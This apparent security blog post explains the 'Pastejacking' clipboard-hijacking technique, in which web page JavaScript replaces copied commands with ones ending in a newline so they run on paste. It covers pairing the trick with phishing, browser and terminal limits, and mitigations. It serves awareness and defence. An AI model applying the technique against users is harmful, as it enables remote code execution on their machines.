A proof-of-concept (PoC) developed by the expert shows the threat posed by a Pastejacking attack when the user pastes commands copied from the web browser into the terminal. The example provided by Ayrey shows how an attacker can trick the user into thinking that they are copying echo "not evil" when in fact the string that gets copied is echo "evil"\n.
It’s worth noting that Ayrey’s PoC only works if the code is copied using keyboard shortcuts. However, the advantage is that the malicious content is added to the clipboard regardless of what piece of text is copied from the PoC page.
The \n (newline) character ensures that the command is executed automatically when pasted into the terminal without the user having to press the enter/return key. This means that the victim doesn’t get to see what they are pasting before it gets executed.
What's different about this is the text can be copied after an event, it can be copied on a short timer following an event, and it's easier to copy in hex characters into the clipboard, which can be used to exploit VIM.
The attack method does not work against Apple’s Safari browser, and some applications, such as the OS X terminal replacement iTerm and the Windows console emulator Cmder, show warnings when a command containing the newline character is about to be pasted.
Experts demonstrated several years ago that HTML/CSS tricks could be used to add arbitrary content to the clipboard without the user’s knowledge. However, the method detailed by developer and security expert Dylan Ayrey, dubbed “Pastejacking,” relies on JavaScript to accomplish the task.
“This method can be combined with a phishing attack to entice users into running seemingly innocent commands. The malicious code will override the innocent code, and the attacker can gain remote code execution on the user's host if the user pastes the contents into the terminal,” Ayrey said.
Users can avoid Pastejacking attack by disabling JavaScript, the best way to avoid falling victim of Pastejacking attacks is to be cautious when copying & pasting content from questionable sources.
No comments:
Post a Comment